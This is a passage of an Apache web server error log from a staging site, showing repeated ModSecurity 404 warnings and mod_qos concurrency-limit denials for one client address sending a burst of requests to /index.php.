[Tue May 26 19:54:02.415760 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM1wAAAFY"]
[Tue May 26 19:54:02.441268 2026] [security2:error] [pid 93867:tid 94133] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAZCDfrjqoHpuuBKsnQAAAVU"]
[Tue May 26 19:54:02.456321 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM1AAAABo"]
[Tue May 26 19:54:02.463420 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM2AAAACY"]
[Tue May 26 19:54:02.465799 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM0AAAAC8"]
[Tue May 26 19:54:02.468841 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM2gAAAAU"]
[Tue May 26 19:54:02.469090 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky8wAAAPU"]
[Tue May 26 19:54:02.553403 2026] [qos:error] [pid 93867:tid 94062] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtApCDfrjqoHpuuBKsuQAAATM
[Tue May 26 19:54:02.553702 2026] [qos:error] [pid 93867:tid 94043] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtApCDfrjqoHpuuBKsuAAAASc
[Tue May 26 19:54:02.567284 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzxAAAAKI
[Tue May 26 19:54:02.586098 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzxQAAALQ
[Tue May 26 19:54:02.591015 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAmDRMqfxdEDkoszM_AAAAEI
[Tue May 26 19:54:02.609290 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzxgAAAJ4
[Tue May 26 19:54:02.614145 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzxwAAAOE
[Tue May 26 19:54:02.619043 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzyAAAAOk
[Tue May 26 19:54:02.620295 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzygAAAIc
[Tue May 26 19:54:02.620434 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzyQAAAI4
[Tue May 26 19:54:02.706414 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzzAAAAMA
[Tue May 26 19:54:02.718057 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzzQAAAOY
[Tue May 26 19:54:02.726805 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzzgAAALw
[Tue May 26 19:54:02.739205 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzzwAAAOU
[Tue May 26 19:54:02.742604 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAmDRMqfxdEDkoszM_QAAAB0
[Tue May 26 19:54:02.759258 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz0AAAAJ8
[Tue May 26 19:54:02.762030 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz0QAAAOQ
[Tue May 26 19:54:02.770797 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz0gAAAIY
[Tue May 26 19:54:02.772355 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz0wAAAIk
[Tue May 26 19:54:02.774936 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz1AAAAPU
[Tue May 26 19:54:02.857498 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz2gAAAMU
[Tue May 26 19:54:02.867946 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz2wAAAOI
[Tue May 26 19:54:02.879223 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz3AAAAJo
[Tue May 26 19:54:02.890493 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAmDRMqfxdEDkoszM_gAAAHY
[Tue May 26 19:54:02.892780 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz3gAAAM4
[Tue May 26 19:54:02.908865 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz3wAAAMM
[Tue May 26 19:54:02.910152 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz4AAAALY
[Tue May 26 19:54:02.920336 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz4QAAAQI
[Tue May 26 19:54:02.924465 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz4gAAAKI
[Tue May 26 19:54:02.930842 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6Kz4wAAALQ
[Tue May 26 19:54:03.009670 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz5AAAALI
[Tue May 26 19:54:03.018247 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz5QAAALc
[Tue May 26 19:54:03.032406 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz5gAAAJM
[Tue May 26 19:54:03.038897 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA2DRMqfxdEDkoszM_wAAADE
[Tue May 26 19:54:03.045792 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz5wAAAJ4
[Tue May 26 19:54:03.057821 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz6AAAAOE
[Tue May 26 19:54:03.057826 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz6QAAANs
[Tue May 26 19:54:03.069868 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz6gAAAOk
[Tue May 26 19:54:03.076463 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz6wAAAIc
[Tue May 26 19:54:03.085512 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz7AAAAI4
[Tue May 26 19:54:03.162330 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz7QAAAMA
[Tue May 26 19:54:03.171179 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz7gAAALw
[Tue May 26 19:54:03.185072 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz7wAAAOQ
[Tue May 26 19:54:03.186847 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA2DRMqfxdEDkoszNAAAAAHs
[Tue May 26 19:54:03.198921 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz8AAAAIY
[Tue May 26 19:54:03.204995 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz8gAAAPU
[Tue May 26 19:54:03.206994 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz8wAAAMU
[Tue May 26 19:54:03.219729 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz9AAAAOI
[Tue May 26 19:54:03.228655 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz9QAAAJo
[Tue May 26 19:54:03.240593 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6Kz9gAAAM4
[Tue May 26 19:54:03.277717 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM1QAAAGw"]
[Tue May 26 19:54:03.278488 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM0QAAAFM"]
[Tue May 26 19:54:03.297374 2026] [security2:error] [pid 93867:tid 94067] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAZCDfrjqoHpuuBKsnwAAATY"]
[Tue May 26 19:54:03.297903 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAUqK9k_ZUB2Vp25FwgAAAeI"]
[Tue May 26 19:54:03.304068 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAUqK9k_ZUB2Vp25FxwAAAZw"]
[Tue May 26 19:54:03.317970 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAUqK9k_ZUB2Vp25FwAAAAZE"]
[Tue May 26 19:54:03.318487 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM3QAAAAM"]
[Tue May 26 19:54:03.323962 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzTQAAAKg"]
[Tue May 26 19:54:03.344422 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM2QAAADQ"]
[Tue May 26 19:54:03.344984 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAUqK9k_ZUB2Vp25FwwAAAgc"]
[Tue May 26 19:54:03.345695 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAUqK9k_ZUB2Vp25FxQAAAZo"]
[Tue May 26 19:54:03.346419 2026] [security2:error] [pid 86490:tid 86728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzQAAAAPE"]
[Tue May 26 19:54:03.348431 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM4QAAABk"]
[Tue May 26 19:54:03.365336 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzUAAAAOw"]
[Tue May 26 19:54:03.366916 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzmQAAAP0"]
[Tue May 26 19:54:03.372033 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAUqK9k_ZUB2Vp25FyQAAAcA"]
[Tue May 26 19:54:03.382224 2026] [security2:error] [pid 93867:tid 94192] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKsqAAAAW8"]
[Tue May 26 19:54:03.389097 2026] [security2:error] [pid 86490:tid 86695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzlwAAANA"]
[Tue May 26 19:54:03.390473 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzSgAAAMY"]
[Tue May 26 19:54:03.403722 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzUwAAANI"]
[Tue May 26 19:54:03.404370 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzOwAAAM8"]
[Tue May 26 19:54:03.405894 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAkqK9k_ZUB2Vp25F3QAAAfM"]
[Tue May 26 19:54:03.418090 2026] [security2:error] [pid 86490:tid 86676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzUQAAAL0"]
[Tue May 26 19:54:03.429166 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzVAAAAL8"]
[Tue May 26 19:54:03.441840 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAkqK9k_ZUB2Vp25F2gAAAZg"]
[Tue May 26 19:54:03.442178 2026] [security2:error] [pid 86490:tid 86698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzlgAAANM"]
[Tue May 26 19:54:03.443062 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAkqK9k_ZUB2Vp25F3gAAAas"]
[Tue May 26 19:54:03.443816 2026] [security2:error] [pid 93867:tid 94146] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKsqQAAAVs"]
[Tue May 26 19:54:03.446034 2026] [security2:error] [pid 93867:tid 94190] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKssAAAAW4"]
[Tue May 26 19:54:03.446273 2026] [security2:error] [pid 93867:tid 94116] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKsrAAAAU0"]
[Tue May 26 19:54:03.459258 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAkqK9k_ZUB2Vp25F5AAAAfs"]
[Tue May 26 19:54:03.459897 2026] [security2:error] [pid 93867:tid 94114] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKsrQAAAUw"]
